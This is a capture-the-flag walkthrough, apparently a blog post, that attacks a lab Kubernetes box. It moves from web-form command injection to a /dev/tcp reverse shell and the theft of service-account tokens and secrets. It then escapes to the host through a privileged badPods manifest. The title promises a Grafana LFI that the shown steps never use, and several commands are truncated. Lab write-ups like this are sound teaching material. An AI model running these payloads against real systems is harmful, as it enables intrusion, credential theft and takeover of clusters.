Exploiting Kubernetes by leveraging a Grafana LFI vulnerability


Spin up the box and connect to the VPN. Lets start by seeing what ports are open on the machine.

nmap -T4
# Host is up (0.093s latency).
# Not shown: 998 closed tcp ports (conn-refused)
# 22/tcp open  ssh
# 80/tcp open  http

SSH and https, lets see whats on the webpage

Alt text

Lets try some basic command injection

localhost; whoami

We get the output challenge we have remote code execution!

Running localhost; env returns a list of all the environment variables. Inside of it is the flag.

Lets create a reverse shell to see what else is there. On our machine (docker) create a listener.

nc -lvnp 8080

In the webpage insert the following into the form: localhost; sh -i >& /dev/tcp/ 0>&1

We know were running inside a container from the environment variables, lets see if there is a service account attached to the pod.

ls -l /var/run/secrets/kubernetes.io/serviceaccount/
# lrwxrwxrwx 1 root root 13 Jan 20 22:05 ca.crt -> ..data/ca.crt
# lrwxrwxrwx 1 root root 16 Jan 20 22:05 namespace -> ..data/namespace
# lrwxrwxrwx 1 root root 12 Jan 20 22:05 token -> ..data/token

Since the kubectl binary is not installed lets try hitting the api server directly with curl.

export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

curl -s https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/version  --header "Authorization: Bearer $TOKEN" --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# {....}

curl -s https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews  --header "Authorization: Bearer $TOKEN" --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Failure

To much work, going to copy the binary from my local machine to the container.

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
python3 -m http.server 9000 -d .

Back in the container

mkdir /tmp/foo
cd /tmp/foo
chmod +x /tmp/foo/kubectl

We can now easily see what permissions we have with the following command

/tmp/foo/kubectl auth can-i --list
# Resources                                       Non-Resource URLs                     Resource Names   Verbs
# selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
# selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
# secrets                                         []                                    []               [get list]

We can list and get secrets.

Side note: Adding the -v 10 flag helped troubleshoot the auth endpoint

curl -X POST -s https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
--header "Authorization: Bearer $TOKEN" \
--cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
-H "Content-Type: application/json" \
-d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","metadata":{"creationTimestamp":null},"spec":{"namespace":"default"},"status":{"resourceRules":null,"nonResourceRules":null,"incomplete":false}}'

Lets see what secrets are there

/tmp/foo/kubectl get secrets
# NAME                    TYPE                                  DATA   AGE
# default-token-8q4vp     kubernetes.io/service-account-token   3      323d
# developer-token-rnmqz   kubernetes.io/service-account-token   3      323d
# secretflag              Opaque                                1      323d
# syringe-token-6w8tq     kubernetes.io/service-account-token   3      323d

/tmp/foo/kubectl get secrets secretflag -o=jsonpath='{.data.flag}' | base64 --decode
# flag{}
/tmp/foo/kubectl get secrets developer-token-rnmqz -o yaml
apiVersion: v1
  namespace: ZGVmYXVsdA==
kind: Secret
    kubernetes.io/service-account.name: developer
    kubernetes.io/service-account.uid: b01b0879-ce02-4014-b612-129eec0167b4
  creationTimestamp: "2023-03-02T23:51:55Z"
  name: developer-token-rnmqz
  namespace: default
  resourceVersion: "865"
  uid: 88dbd00f-c67d-4799-bb66-4e10c4cd809a
type: kubernetes.io/service-account-token

The developer-token secret contains information that is used to authenticate against the api server. Lets see what permissions the developer service account has.

export K8S_TOKEN=`/tmp/foo/kubectl get secrets developer-token-rnmqz -o=jsonpath='{.data.token}' | base64 -d`
/tmp/foo/kubectl --token=$K8S_TOKEN auth can-i --list
# Resources                                       Non-Resource URLs                     Resource Names   Verbs
# *.*                                             []                                    []               [*]
#                                                 [*]                                   []               [*]
# selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
# selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]

All verbs on all resources, it has all the permissions!

Lets see what else is running using the new token

/tmp/foo/kubectl --token=$K8S_TOKEN get pods
# NAME                       READY   STATUS    RESTARTS       AGE
# grafana-57454c95cb-f9js5   1/1     Running   2 (323d ago)   323d
# syringe-79b66d66d7-6xdjz   1/1     Running   2 (323d ago)   323d

/tmp/foo/kubectl --token=$K8S_TOKEN exec -it grafana-57454c95cb-f9js5 -- env
# flag{}

The flag could also be found by running this command

/tmp/foo/kubectl --token=$K8S_TOKEN get pods grafana-57454c95cb-f9js5 -o yaml | grep flag

Lets see what image its running and then look for what CVEs it could be vulnerable too.

/tmp/foo/kubectl --token=$K8S_TOKEN get pods grafana-57454c95cb-f9js5 -o yaml | grep image

Now lets get host access, since we have full cluster access it should be easy


BishopFox has an example file that mounts the root directory onto a pod. Lets pull it on our local machine

wget https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml

Edit the file everything-allowed-exec-pod.yaml to a different image grafana/grafana-enterprise:8.3.0-beta2 that is already on the instance since its being run by another pod.

Note: Running into an issue where ubuntu does not seem to be on the instance.

python3 -m http.server 9000 -d .

Back in the container, let create the pod resource pulling the file from our local machine.

/tmp/foo/kubectl --token=$K8S_TOKEN apply -f

Now we can exec into it and see what files are on the host machine.

/tmp/foo/kubectl --token=$K8S_TOKEN exec -it everything-allowed-exec-pod --container everything-allowed-pod -- bash

ls -l /host/root
# total 4
# -rw-rw-r--    1 1000     1000            39 Jan  6  2022 root.txt

cat /host/root/root.txt
# flag{}